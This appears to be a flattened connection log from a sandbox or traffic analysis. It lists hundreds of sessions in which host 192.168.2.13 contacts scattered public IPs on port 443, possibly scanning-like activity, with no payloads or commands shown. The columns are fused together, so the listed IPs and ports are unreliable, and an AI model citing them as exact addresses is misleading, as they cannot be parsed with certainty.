                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22591192.168.2.136090449.8.192.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22592192.168.2.13377905.175.155.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22593192.168.2.1357018183.211.116.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22594192.168.2.1338042172.141.103.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22595192.168.2.135532812.135.14.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22596192.168.2.134008637.25.194.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22597192.168.2.133756638.1.127.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22598192.168.2.1348684136.249.221.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22599192.168.2.134736261.12.1.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22600192.168.2.133327070.108.55.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22601192.168.2.135163281.223.185.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22602192.168.2.134137443.129.215.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22603192.168.2.1340114128.244.57.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22604192.168.2.1355414122.154.55.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22605192.168.2.134714442.114.213.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22606192.168.2.1360768112.250.4.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22607192.168.2.1340602221.73.168.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22608192.168.2.1352126203.205.39.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22609192.168.2.133400257.160.218.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22610192.168.2.136061824.156.213.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22611192.168.2.1340016133.59.159.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22612192.168.2.135532648.217.79.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22613192.168.2.134522893.232.213.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22614192.168.2.1338346213.65.109.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22615192.168.2.1344236199.242.251.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22616192.168.2.1334048184.174.123.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22617192.168.2.1336952188.231.119.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22618192.168.2.133985625.143.212.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22619192.168.2.136083486.36.17.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22620192.168.2.1336322211.194.38.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22621192.168.2.1352374195.79.67.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22622192.168.2.133547460.105.245.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22623192.168.2.1344914104.22.73.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22624192.168.2.13497344.64.211.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22625192.168.2.133641873.187.144.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22626192.168.2.1357212123.141.141.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22627192.168.2.1337064167.151.23.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22628192.168.2.1359350108.248.218.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22629192.168.2.135284414.253.60.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22630192.168.2.1354460130.218.127.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22631192.168.2.135771441.77.62.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22632192.168.2.136068877.24.84.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22633192.168.2.134755686.225.221.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22634192.168.2.1350868182.72.77.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22635192.168.2.134533452.18.65.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22636192.168.2.1359242120.195.120.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22637192.168.2.134691889.185.226.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22638192.168.2.1354546154.126.205.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22639192.168.2.135784892.205.178.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22640192.168.2.134225451.182.175.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22641192.168.2.135347842.115.139.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22642192.168.2.1351222156.190.33.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22643192.168.2.1334080191.220.23.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22644192.168.2.1343846182.34.11.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22645192.168.2.135981061.74.225.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22646192.168.2.1337984156.170.2.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22647192.168.2.135968287.157.113.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22648192.168.2.1353310210.234.194.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22649192.168.2.135183019.55.109.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22650192.168.2.1337042104.56.235.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22651192.168.2.1336646203.31.87.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22652192.168.2.1354942155.60.250.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22653192.168.2.135467025.183.94.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22654192.168.2.134038632.207.30.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22655192.168.2.1341580222.178.1.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22656192.168.2.134457496.225.100.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22657192.168.2.1345136223.46.252.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22658192.168.2.1333326213.202.2.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22659192.168.2.133700840.218.202.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22660192.168.2.1355460153.69.41.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22661192.168.2.133838094.18.42.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22662192.168.2.1348980104.104.83.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22663192.168.2.1333604184.149.176.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22664192.168.2.1341570146.115.29.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22665192.168.2.1352886146.92.174.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22666192.168.2.1342600119.157.25.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22667192.168.2.133326689.206.98.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22668192.168.2.1351106170.61.108.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22669192.168.2.13572269.18.127.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22670192.168.2.135235651.58.189.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22671192.168.2.1351620114.62.22.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22672192.168.2.1349728204.127.179.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22673192.168.2.1359020118.19.210.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22674192.168.2.1349530134.27.165.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22675192.168.2.1341020137.248.11.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22676192.168.2.1349070109.188.95.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22677192.168.2.1350820122.54.74.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22678192.168.2.1335560148.85.217.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22679192.168.2.1343156154.77.49.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22680192.168.2.133351819.16.159.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22681192.168.2.135193094.32.213.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22682192.168.2.134871866.17.34.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22683192.168.2.1353146146.65.229.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22684192.168.2.135273046.186.23.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22685192.168.2.1344292177.182.169.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22686192.168.2.135313493.141.183.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22687192.168.2.1360676150.139.18.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22688192.168.2.1340064221.61.235.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22689192.168.2.1349174200.30.125.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22690192.168.2.1353686166.36.228.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22691192.168.2.1339794194.9.148.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22692192.168.2.1351636164.194.36.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22693192.168.2.135885217.247.89.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22694192.168.2.133943283.59.24.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22695192.168.2.1360730190.191.192.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22696192.168.2.133808877.99.115.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22697192.168.2.1355644142.72.55.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22698192.168.2.135169087.173.23.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22699192.168.2.1349324208.144.151.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22700192.168.2.1345152109.20.69.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22701192.168.2.133548893.53.242.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22702192.168.2.1348736165.106.117.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22703192.168.2.1347258164.185.167.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22704192.168.2.1352878112.113.89.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22705192.168.2.1342838187.206.99.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22706192.168.2.133761070.41.123.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22707192.168.2.1357798212.40.199.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22708192.168.2.133526452.56.114.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22709192.168.2.1333532148.56.69.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22710192.168.2.135333223.249.48.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22711192.168.2.1353588172.213.159.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22712192.168.2.1351590117.179.90.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22713192.168.2.1346548201.35.217.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22714192.168.2.1358908129.32.116.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22715192.168.2.135463099.145.152.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22716192.168.2.1344410100.225.135.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22717192.168.2.1358668119.162.207.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22718192.168.2.1348354212.63.35.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22719192.168.2.1338980157.58.217.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22720192.168.2.1348182140.24.80.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22721192.168.2.1356848221.245.64.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22722192.168.2.1346904149.167.98.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22723192.168.2.1350192170.127.65.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22724192.168.2.1332814193.225.137.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22725192.168.2.1350740166.176.117.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22726192.168.2.135656487.224.249.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22727192.168.2.1332792109.173.245.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22728192.168.2.134218864.25.198.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22729192.168.2.1360596124.125.222.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22730192.168.2.1346224160.148.188.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22731192.168.2.1350672106.142.128.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22732192.168.2.134499277.44.102.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22733192.168.2.133634646.172.229.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22734192.168.2.13579288.17.114.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22735192.168.2.1353588128.100.75.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22736192.168.2.1345798174.131.75.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22737192.168.2.1348598213.203.93.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22738192.168.2.1342456156.23.252.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22739192.168.2.1346698170.105.101.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22740192.168.2.134938845.203.115.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22741192.168.2.1345080200.203.201.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22742192.168.2.13386805.78.5.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22743192.168.2.1351404150.54.138.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22744192.168.2.133621435.127.119.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22745192.168.2.1344936218.199.125.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22746192.168.2.135462041.227.13.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22747192.168.2.1351144191.224.17.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22748192.168.2.1354314219.74.116.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22749192.168.2.1337248156.154.19.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22750192.168.2.1341026217.171.242.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22751192.168.2.1356962206.81.75.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22752192.168.2.1360088180.47.198.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22753192.168.2.1346320166.117.209.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22754192.168.2.1357584209.104.60.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22755192.168.2.134440662.230.212.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22756192.168.2.1347030114.32.198.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22757192.168.2.134703095.205.56.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22758192.168.2.135742699.142.162.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22759192.168.2.134033499.210.133.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22760192.168.2.1344194118.233.223.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22761192.168.2.135239496.153.55.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22762192.168.2.134747258.212.208.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22763192.168.2.135626891.231.100.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22764192.168.2.1356486125.140.110.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22765192.168.2.135415024.237.35.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22766192.168.2.134765057.140.119.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22767192.168.2.1334486109.18.110.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22768192.168.2.135945423.119.47.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22769192.168.2.13365824.202.117.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22770192.168.2.136081231.5.0.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22771192.168.2.1355962102.225.34.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22772192.168.2.133587231.129.236.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22773192.168.2.1352748139.105.202.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22774192.168.2.134449837.240.50.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22775192.168.2.135798487.93.4.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22776192.168.2.1355314207.212.193.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22777192.168.2.1348338145.37.254.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22778192.168.2.1348792182.190.74.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22779192.168.2.133683254.237.210.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22780192.168.2.1337738143.23.140.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22781192.168.2.133342637.78.166.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22782192.168.2.1348034196.162.35.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22783192.168.2.133436280.135.152.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22784192.168.2.1346258162.17.17.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22785192.168.2.135897225.252.74.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22786192.168.2.135900452.129.217.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22787192.168.2.133856666.143.195.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22788192.168.2.1343266186.19.78.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22789192.168.2.1342456152.58.186.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22790192.168.2.1344780114.34.228.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22791192.168.2.135965654.218.245.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22792192.168.2.1337004133.55.82.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22793192.168.2.1356340208.250.31.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22794192.168.2.134480654.143.229.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22795192.168.2.1339708217.32.32.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22796192.168.2.1360286208.46.157.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22797192.168.2.1360900118.40.244.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22798192.168.2.133810447.172.211.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22799192.168.2.135804076.255.79.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22800192.168.2.1351702175.159.178.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22801192.168.2.1355144111.103.97.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22802192.168.2.1338574175.163.187.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22803192.168.2.1336684118.140.192.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22804192.168.2.134075234.216.162.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22805192.168.2.134255867.43.31.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22806192.168.2.135833887.57.121.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22807192.168.2.1338530126.7.106.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22808192.168.2.1355506141.5.226.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22809192.168.2.133647649.13.159.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22810192.168.2.1345446133.20.52.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22811192.168.2.134513047.76.178.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22812192.168.2.135721062.191.224.219443
